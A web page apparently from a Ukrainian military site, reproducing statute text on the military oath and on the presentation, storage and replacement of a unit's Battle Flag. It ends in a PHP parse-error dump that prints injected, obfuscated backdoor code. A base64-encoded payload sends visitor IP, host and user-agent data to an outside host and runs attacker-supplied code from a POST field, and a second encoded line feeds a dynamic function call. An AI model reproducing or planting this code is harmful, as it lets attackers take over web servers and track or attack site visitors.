Військова присяга.Бойовиі прапор.

Український легіон » Дисципліни » Статут ЗСУ » Військова присяга.Бойовиі прапор.

Військовослужбовці Збройних Сил України, якими можуть бути лише громадяни України, мають права й свободи громадян України з урахуванням особливостей, що визначаються Конституцією України, законами України з військових питань, військовими статутами Збройних Сил України та іншими нормативно-правовими актами. На військовослужбовців покладаються обов'язки, що визначаються військовими статутами та порадниками Збройних Сил України.

Кожний військовослужбовець має військове звання відповідно до Закону України «Про загальний військовий обов'язок і військову службу». Військові звання поділяються на армійські та корабельні згідно з додатком 3 до цього Статуту.

 

1.  Військова присяга, її моральноправова характеристика .

Кожен громадянин України, який поступає на військову службу, особисто складає Військову присягу на вірність українському народові та скріплює її власноручним підписом.

Військова присяга покладає на військовослужбовця всю повноту відповідальності за виконання ним військового обов'язку.

Військову присягу складають:

військовослужбовці, які прибули до військової частини для проходження військової служби і раніше не складали Військової присяги,—після проходження ними програми підготовки, вивчення основних положень військового законодавства України, військових статутів стосовно їх прав та обов'язків, виконання вправи стрільби із стрілецької зброї, але не пізніше ніж через місяць від дня прибуття до військової частини:,

курсанти військово-навчальних закладів, військових відділень, кафедр та факультетів цивільних навчальних закладів, які раніше не складали Військової присяги,—в той самий термін;

приписані до військової частини військовозобов'язані, які раніше не складали Військової присяги, — не пізніше ніж протягом п'яти днів після прибуття до військової частини для проходження навчальних зборів.

День складання Військової присяги є святковим для військової частини.

Час і місце складання Військової присяги встановлюються окремим наказом командира військової частини й оголошуються всьому особовому складові.

На складання Військової присяги за рішенням командира військової частини можуть запрошуватися близькі родичі військовослужбовців, які складають Військову присягу, а також інші гості.

Для складання Військової присяги військовослужбовці прибувають у парадному одязі. У воєнний час форма одягу встановлюється командиром військової частини.

У призначений час військова частина під Бойовим Прапором і з оркестром шикується в лінію ротних (взводних) колон. Військовослужбовці, які складають присягу, стоять у перших рядах. Ритуал складання Військової присяги розпочинається виступом командира військової частини про значення Військової присяги для сумлінного, самовідданою служіння Україні. За ним до військовослужбовців, які складають Військову присягу, звертаються представники вищого командування, ветерани Збройних Сил України, близькі родичі, офіцери та прапорщики військової частини, військовослужбовці строкової служби.

Після цього командир частини дає розпорядження командирам підрозділів приступити до складання військовослужбовцями Військової присяги,

Командири   підрозділів   за   алфавітним   списком   викликають військовослужбовців, які перед строєм проголошують текст Військової присяги, розписуються в цьому списку напроти свого прізвища. Після складання Військової присяги списки з особистими підписами осіб, які склали Військову присягу, командири підрозділів урочисто вручають командирові військової частини.

Командир військової частини поздоровляє військовослужбовців із складанням Військової присяги, а всю військову частину—з поповненням її особового складу. Після цього оркестр виконує Державний Гімн України.

Після виконання Державного Гімну України військова частина проходить урочистим маршем у порядку, визначеному у Стройовому статуті Збройних Сил України.

За несприятливих погодних умов складання Військової присяги проводиться у приміщенні.

Для військовослужбовців, які не змогли скласти Військову присягу у визначений термін, призначається інший день і час.

Загальні списки осіб, які склали Військову присягу, зберігаються у штабі військової частини пронумерованими, прошнурованими та скріпленими сургучевою печаткою в окремій папці. Після закінчення встановленого терміну списки здаються на зберігання до архіву.

У військовому квитку (особистому посвідченні) військовослужбовця начальник штабу військової частини робить відмітку «Військову присягу склав (день, місяць, рік)».

За виконання вимог цього Положення, забезпечення збереження загальних списків та облік військовослужбовців, які склали Військову присягу, відповідає командир військової частини.

  

2. Бойовий прапор військової частини.

Бойовий Прапор вручається дивізіям, бригадам, полкам, окремим батальйонам, дивізіонам, авіаескадрильям, військово-навчальиим закладам і навчальним частинам (далі—військовим частинам).

Частинам тилового, технічного та медичного забезпечення, охорони і обслуговування,   навчально-тренувальним,   дисциплінарним,   інженерно-технічним та іншим подібним військовим частинам Бойовий Прапор не вручається.

В окремих випадках, коли у військовій частині за умовами дислокації, оперативного призначення або з інших . причин не може бути забезпечено належне зберігання і тримання Бойового Прапора, рішенням начальника Генерального штабу Збройних Сил України Бойовий Прапор такій військовій частині може не замовлятися і не вручатися.

Порядок вручення Бойового Прапора військовій частині.

Бойовий Прапор вручається військовій частині після її сформування від імені Президента України представником Міністерства оборони України, виду Збройних Сил України, оперативного командування або іншим командиром (начальником) за дорученням Міністра оборони України.

Під час вручення Бойового Прапора військовій частині видається Грамота Президента України.

Вручення Бойового Прапора військовій частині проводиться в урочистій обстановці.

Для вручення Бойового Прапора військова частина шикується зі зброєю так, як цього вимагає Стройовий статут Збройних Сил України для стройового огляду.

Під час вручення Бойового Прапора в бойових умовах порядок шикування військової частини встановлюється з урахуванням бойової обстановки.

Для винесення Бойового Прапора до місця шикування за розпорядженням начальника, який прибув для вручення Бойового Прапора, командир військової частини призначає прапороносця і двох асистентів з офіцерів, прапорщиків або сержантів, переважно нагороджених орденами і медалями, та відмінників бойової підготовки і прапороносний взвод.

У визначений час прапороносець виносить Бойовий Прапор у чохлі та прямує за три кроки позаду начальника, який вручає Бойовий Прапор, до місця шикування військової частини. При цьому прапороносець тримає Бойовий Прапор на лівому плечі у положенні визначеному Стройовим статутом Збройних Сил України;

справа і зліва від прапороносця крокують асистенти.

Після того як особа, що прибула для вручення Бойового Прапора наблизиться на 40—50 кроків до строю, командир військової частини подає команду: «Полк, на Прапор СТРУНКО, рівняння— ПРАВОРУЧ (ЛІВОРУЧ, на СЕРЕДИНУ)». Якщо полк озброєний карабінами, то командир подає КОМАНДУ:

«Полк, на Прапор СТРУНКО. Для зустрічі справа (зліва, з фронту) зброєю— ЧЕСТЬ».

Оркестр виконує «Зустрічний марш».

Командир військової частини подавши команду, прикладає руку до головного убору, підходить до особи, яка прибула для вручення Бойового Прапора» зупиняється перед нею. за два-три кроки і доповідає: «Товаришу (пане) генерал-майоре. Перший механізований полк з нагоди вручення Бойового Прапора вишикуваний. Командир полку полковник Марі».

У момент зупинки командира полку для доповіді особі, яка прибула вручати Бойовий Прапор, оркестр припиняє грати. Прапороносець ставить Бойовий Прапор до правої ноги вертикально, притримуючи його біля ноги опущеною правою рукою згідно з вимогами Стройового статуту Збройних Сил України.

Особа, яка прибула для вручення Бойового Прапора, прийнявши доповідь, стає перед серединою строю, вітається з особовим складом військової частини і підходить до прапороносця. Прапороносець з підходом особи, яка вручає Бойовий Прапор, нахиляє і тримає його горизонтально обома руками. Особа, яка вручає Бойовий Прапор, знімає чохол і розгортає Бойовий Прапор. Потім прапороносець, поставивши Бойовий Прапор вертикально, підтримуючи його правою рукою, стає обличчям до строю.

Особа, яка вручає Бойовий Прапор, зачитує Грамоту Президента України, після чого вручає Бойовий Прапор і Грамоту командирові військової частини. Оркестр виконує Державний Гімн України.

Командир військової частини, прийнявши Бойовий Прапор і Грамоту Президента України, після закінчення виконання оркестром Державного Гімну України передає Бойовий Прапор прапороносцеві та подає команду:

«Прапороносець, за МНОЮ КРОКОМ — Руш». Прапороносець за командою «Кроком» бере бойовий Прапор на ліве плече.

Командир військової частини і через три кроки за ним прапороносець з Бойовим Прапором та асистенти прямують до лівого флангу строю, після чого проходять уздовж фронту (за 10—15 кроків від строю) до правого флангу строю. Вийшовши на правий фланг, командир військової частини наказує прапороносцеві з асистентами стати на місце, визначене ним у строю. Оркестр з початком руху і до зупинки прапороносця у строю виконує «Зустрічний марш». Особовий склад військової частини вітає Бойовий Прапор тривалим «Слава».

Після того як прапороносець стане на місце, командир військової частини подає оркестру знак для припинення гри, виходить на середину строю і зупиняється поруч з особою, яка вручала Бойовий Прапор, а потім за її вказівкою подає команду «Вільно», а якщо полк тримав карабіни у положенні «зброєю—ЧЕСТЬ», попередньо подає команду: «Полк, до ноги».

Особа, яка вручила Бойовий Прапор, вітає особовий склад військової частини з одержанням Бойового Прапора. Особовий склад військової частини на привітання відповідає триразовим тривалим «Слава». Після цього командир військової частини виступає із словом у відповідь.

На завершення вручення Бойового Прапора підрозділи військової частини проходять урочистим маршем перед особою, яка вручила Бойовий Прапор, знову шикуються. Бойовий Прапор відноситься до місця його зберігання.

Після вручення Бойового Прапора по військовій частині видається наказ, згідно з яким встановлюється місце для зберігання Бойового Прапора і призначаються прапороносець, асистенти та прапороносний взвод.

Місце Бойового Прапора в строю, порядок його винесення і віднесення встановлюються Стройовим статутом Збройних Сил України, а порядок охорони — Статутом гарнізонної та вартової служб Збройних Сил України.

Порядок зберігання та тримання Бойового Прапора

Бойовий Прапор військової частини повинен знаходитися;

у разі розміщення військової частини в казармах та розташування її у населених пунктах — у приміщенні штабу військової частини;

у військових частинах, які здійснюють бойове чергування, — на командному пункті військової частини;

у разі розташування військової частини табором (у наметах) — на лінії першого ряду наметів у центрі розташування військової частини, під спеціальним навісом;

на навчаннях — на місці, визначеному командиром військової частини.

Бойовий Прапор дивізії може зберігатися за наказом командира дивізії у найкращій військовій частині разом з Бойовим Прапором цієї військової частини.

Дозволяється спільне зберігання бойових прапорів кількох військових частин з'єднання, дислокованих в одному військовому містечку.

Бойовий Прапор завжди перебуває під охороною варти а під час винесення його до військової частини — під охороною прапороносного взводу, Бойовий  Прапор на посту зберігається у згорнутому вигляді й у чохлі, опечатаному гербовою сургучевою печаткою військової частини; він має бути встановлений вертикально у підпору прапора.

У разі розміщення військової частини у казармах дозволяється зберігати Бойовий Прапор у розгорнутому вигляді в запечатаній заскленій шафі.

На посту поряд з Бойовим Прапором може перебувати під охороною скринька для грошей.

У разі перевезення військової частини транспортом для Бойового Прапора виділяється окремий автомобіль, вагон; купе, каюта, літак (салон). Разом із Бойовим Прапором переїжджають прапороносець, асистенти і варта, а також можуть перевозитися скринька для грошей та сейф із секретними документами.

За правильне зберігання Бойового Прапора безпосередньо відповідає начальник штабу військової частини, який зобов'язаний:

систематично перевіряти особисто або через свого заступника (помічника) несення служби чатовими на посту біля Бойового Прапора;

проводити не рідше ніж один раз на місяць огляд Бойового Прапора;

вести журнал огляду Бойового Прапора, зазначаючи в ньому час огляду, недоліки, виявлені під час, огляду, і заходи, вжиті для їх усунення, про що доповідає командирові військової частини.

Огляд Бойового Прапора проводиться начальником штабу в присутності прапороносця, асистентів і начальника варти. Начальник штабу наказує розгорнути Бойовий Прапор для огляду і перевіряє кількість і стан державних нагород, стан полотнища, справність чохла, древка, наконечника.

Після закінчення огляду начальник штабу наказує згорнути Бойовий Прапор, Прапороносець опускає Бойовий Прапор горизонтально, стежачи за тим, щоб його полотнище не торкалося землі (підлоги), асистент бере полотнище за ріжки і рівномірно натягує його. Прапороносець та інший асистент, повільно обертаючи древко, згортають полотнище лицьовим боком усередину, стежачи при цьому, щоб не було складок.

На згорнуте полотнище Бойового Прапора асистенти надівають чохол, начальник штабу запечатує його гербовою сургучевою печаткою і після цього здає Бойовий Прапор під охорону варти.

Під час винесення Бойового Прапора до військової частини і здавання його під охорону варти розгортання і згортання полотнища проводиться прапороносцем та асистентами під безпосереднім наглядом начальника штабу або його помічника (заступника), як це визначено в пункті 20 цього Положення.

Просушування  полотнища  Бойового  Прапора  проводиться  поза приміщенням у затінку або у приміщенні. Під час просушування Бойовий Прапор охороняється прапороносцем та асистентами.

Здавання, заміна і ремонт Бойового Прапора

У разі розформування військової частини Бойовий Прапор і Грамота Президента України відправляються з короткою історичною довідкою таємним порядком, фельдзв'язком через штаби видів Збройних Сил України, військових округів, оперативних командувань на зберігання до меморіального комплексу «Український музей історії Великої Вітчизняної війни 1941—1945 років».

Копії супровідних документів подаються до Генерального штабу Збройних Сил України через управління служби військ і режиму Генерального штабу Збройних Сил України.

Бойові прапори, які зазнали значних пошкоджень або від часу постаріли і ремонт та реставрацію яких провести неможливо, підлягають заміні.

Для прийняття рішення про заміну Бойового Прапора або проведення його ремонту Бойовий Прапор оглядається спеціально призначеною комісією штабу вищого рівня за участю начальника штабу військової частини. В акті огляду зазначаються всі дефекти, які є на Бойовому Прапорові, причини їх виникнення, а також висновок комісії про заміну Бойового Прапора або проведення його ремонту. Акт огляду Бойового Прапора затверджується начальником штабу виду Збройних Сил України, оперативного командування, а також  начальником  відповідного  управління  центрального  апарату Міністерства оборони України, яким і приймається рішення про заміну Бойового Прапора або проведення його ремонту.

Відповідно до рішення про заміну Бойового Прапора штабом виду Збройних Сил України, оперативного командування, начальниками управлінь центрального апарату Міністерства оборони України подається заявка на виготовлення нового Бойового Прапора, яка разом із затвердженим актом надсилається до Центрального речового управління тилу Збройних Сил України. Копії акта та заявки подаються до Головного організаційно-мобілізаційного управління та управління служби військ і режиму Генерального штабу Збройних Сил України.

Центральне речове управління тилу Збройних Сил України у встановленому порядку доставляє новий Бойовий Прапор до військової частини таємним порядком.

Старий Бойовий Прапор після одержання нового Бойового Прапора разом із історичною довідкою згідно з порядком, встановленим пунктом 23 цього Положення, надсилається до меморіального комплексу «Український музей історії Великої Вітчизняної війни 1941—1945 років».

Проводити ремонт полотнища Бойового Прапора силами і засобами військової частини забороняється. Дозволяється лиша у разі нагальної потреби ремонтувати древко і наконечник. Якщо виникає потреба у лагодженні полотнища Бойового Прапора, командир військової частини порушує у порядку підпорядкованості клопотання про відправлення полотнища Бойового Прапора до спеціальної майстерні. Після одержання на це дозволу'' полотнище Бойового Прапора доставляється до майстерні у встановленому порядку.

Здавання полотнища Бойового Прапора на ремонт оформляється актом.

Порядок передачі бойових прапорів і почесних назв під час переформування військових частин

Бойовий Прапор зберігається за військовою частиною на весь час її існування незалежно від зміни назви і номера частини.

У разі реорганізації військової частини відомості про зміну назви або номера частини заносяться до Грамоти Президента України командиром військової частини і засвідчуються гербовою печаткою.

Для збереження традицій військових частин і пам'яті про їх заслуги бойові прапори та почесні назви частин можуть передаватися іншим військовим частинам. При цьому передавання Бо'йового Прапора і почесних назв здійснюється лише за наявності прямої спадкоємності у разі переформування однієї або кількох частин у нову частину (частини).

Під час переформування однієї військової частини в іншу Бойовий Прапор, Грамота Президента України до нього і почесна назва частини повністю зберігаються за новою військовою частиною.

Під час переформування двох і більше військових частин в одну за новою частиною зберігаються Бойовий Прапор, Грамота Президента України до нього, а також почесна назва однієї з переформованих частин. Бойові прапори і грамоти Президента України до них інших частин здаються у встановленому порядку. Питання про передавання новій військовій частині Бойового Прапора та почесної назви розглядається Генеральним штабом Збройних Сил України одночасно з питанням про переформування військової частини.

Старі бойові прапори військових частин з орденами, грамотами та історичними довідками за узгодженням з Міністерством оборони України можуть бути вередані на зберігання до музею (кімнати) Бойової Слави військових частин або місцевих музеїв для відкритої експозиції лише через . меморіальний комплекс "Український музей історії Великої Вітчизняної війни 1941—1945 р.".

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0126 s(22 Requests)
  PHP: 0,3143 s 
  Total: 0,3269 s